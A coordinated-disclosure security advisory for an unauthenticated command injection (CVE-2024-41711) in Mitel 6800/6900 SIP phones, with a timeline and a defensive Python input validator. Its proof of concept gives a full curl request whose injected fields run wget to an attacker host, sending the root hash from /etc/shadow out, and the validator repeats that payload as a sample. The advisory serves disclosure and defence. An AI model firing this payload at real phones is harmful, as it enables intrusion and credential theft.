Security Advisory: Unauthenticated Command Injection in Mitel IP Phones

Denys Vozniuk
Security Consultant

Summary

The Mitel Series SIP Phones web administration interface executes an unauthenticated OS command constructed with unsanitized user input.

Affected Manufacturer: Mitel

Model: Mitel-6800/6900/6900w/6970

Versions: R6.4.0.HF1 (R6.4.0.136) and earlier

CVEs: CVE-2024-41711

Impact (CVSS): 8.8 (high) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

  • Mitel 6800 Series SIP Phones    R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900 Series SIP Phones R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900w Series SIP Phone R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6970 Conference Unit R6.4.0.HF1 (R6.4.0.136) and earlier

Impact

By successfully exploiting this flaw, a remote unauthenticated attacker can execute arbitrary commands on the device with elevated privileges.

Description

The "webconfig" CGI binary manages the web administration interface and relies on an outdated method of input parsing. It is executed as a CGI binary of the HTTPD web server with the command:

/usr/sbin/httpd -h /webroot

This interface, which includes the “Ethernet Settings” page, processes user data without validation: users can enter any input (strings, numbers or special characters), and it is copied directly into configuration files. When users click “Save”, all entered data is written to the config file /nvdata/etc/enet.cfg and applied within the operating system as environment settings with the highest priority via the if_setup.sh up script. Additionally, attackers can exploit a concatenation bug that appends strings to the config file, enabling them to bypass string length restrictions (further details below).

Proof-Of-Concept

For this proof of concept, we'll craft an exploit that allows an attacker to read the root hash from the shadow file. To demonstrate both command injection and a string length bypass, we'll use the parameters "Router IP Address" and "Domain Name" for the attack, though an attacker could leverage any suitable parameter for their payload. Here, we input the command injection payload via the web interface, splitting it into two parts.

After pressing “Save“, you can see the following request being sent:

An attacker listening on port "4444" will receive the root hash string.

The config file “/nvdata/etc/enet.cfg” will then look like this:

Use the following curl command for testing, updating the IP address and Host address as needed, from “127.0.0.1” to the router’s IP address and the attacker's machine.

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1' -H $'Content-Length: 344' \
    --data-binary $'\x0d\x0aMAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1&MAIN%2FENETCFG_DNS3=10.10.10.10' \
    $'http://127.0.0.1/cgi-bin/webconfig?page=enetcfg&action=submit'
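As an added defender-side example (not ONEKEY's or Mitel's code), this is the kind of strict per-field allowlist a hardened webconfig handler could apply before anything is written to /nvdata/etc/enet.cfg. Run against the form fields from the curl request above, it rejects exactly the two injected parameters; the field names come from the request body, while the "on"/"off" vocabulary for the DHCP flag is an assumption.

```python
import ipaddress
import re
from urllib.parse import parse_qsl

# Constructed sample: the form fields from the advisory's curl request, URL-encoded
# as the webconfig CGI receives them (leading CRLF omitted).
POC_BODY = (
    "MAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0"
    "&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1"
    "&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D"
    "%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60"
    "&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1&MAIN%2FENETCFG_DNS3=10.10.10.10"
)

# RFC 1123 hostname labels: letters, digits and '-', no leading or trailing '-'.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$", re.IGNORECASE)

def is_ipv4(value):
    """Dotted-quad IPv4 only; shell metacharacters never parse as an address."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True

def is_hostname(value):
    return len(value) <= 253 and _HOSTNAME_RE.match(value) is not None

# Allowlist: each enetcfg field maps to the only value shape it may hold. Checking
# the shape per field (not the length) also defeats the concatenation bypass,
# because no fragment can carry ';', '`' or ':' through on its own.
FIELD_RULES = {
    "MAIN/ENETCFG_DHCP": lambda v: v in ("on", "off"),      # assumed vocabulary
    "MAIN/ENETCFG_IPADDR": lambda v: v == "" or is_ipv4(v),  # blank when DHCP is on
    "MAIN/ENETCFG_SUBNET": is_ipv4,
    "MAIN/ENETCFG_ROUTER": lambda v: v == "" or is_ipv4(v),
    "MAIN/ENETCFG_DOMAIN": lambda v: v == "" or is_hostname(v),
    "MAIN/ENETCFG_DNS1": is_ipv4,
    "MAIN/ENETCFG_DNS2": is_ipv4,
    "MAIN/ENETCFG_DNS3": is_ipv4,
}

def validate_enetcfg(body):
    """Return (accepted, rejected) dicts of decoded values; unknown fields are rejected."""
    accepted, rejected = {}, {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        rule = FIELD_RULES.get(key)
        (accepted if rule is not None and rule(value) else rejected)[key] = value
    return accepted, rejected
```

Calling validate_enetcfg(POC_BODY) returns the ROUTER and DOMAIN fields in the rejected dict with their decoded payloads, while the six well-formed fields are accepted.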

Takeaways

This vulnerability highlights the significant security risk posed by web administration interfaces that use outdated input parsing methods. The high CVSS score (8.8) underlines the critical nature of the flaw, which allows unauthenticated remote attackers to execute arbitrary commands with elevated privileges.

If you manage or use Mitel SIP phones—or any networked devices with embedded web interfaces—it's essential to assess and test your firmware for similar issues. This includes scanning for unvalidated user input and command injection points. Organizations should regularly review and update device firmware and implement strong input sanitization to prevent unauthorized system access and data breaches.

Timeline

  • 2024-02-27: Vulnerability identified
  • 2024-03-28: Sent coordinated disclosure request to PSIRT@mitel.com
  • 2024-03-28: Received guidance on the secure communication channel from vendor
  • 2024-04-09: Sent vulnerability disclosure report to the vendor through secure communication channel
  • 2024-04-09: Vendor responded and started analysis
  • 2024-05-01: Vendor responded that we were using an old version and needed to test on version 6.4 to prove the findings
  • 2024-05-14: We received the latest version 6.4 and found that the findings still exist
  • 2024-05-21: We shared an update for the new version with proof-of-concepts for the findings
  • 2024-05-21: Vendor responded and started analysis
  • 2024-06-21: Vendor confirmed the “Unauthenticated Command Injection” findings and started working on a new release; we agreed to wait for the vendor's release and advisory
  • 2024-07-17: Vendor published Security Advisory 24-0020 for the reported issue
  • 2024-07-30: Vendor provided CVE number CVE-2024-41711
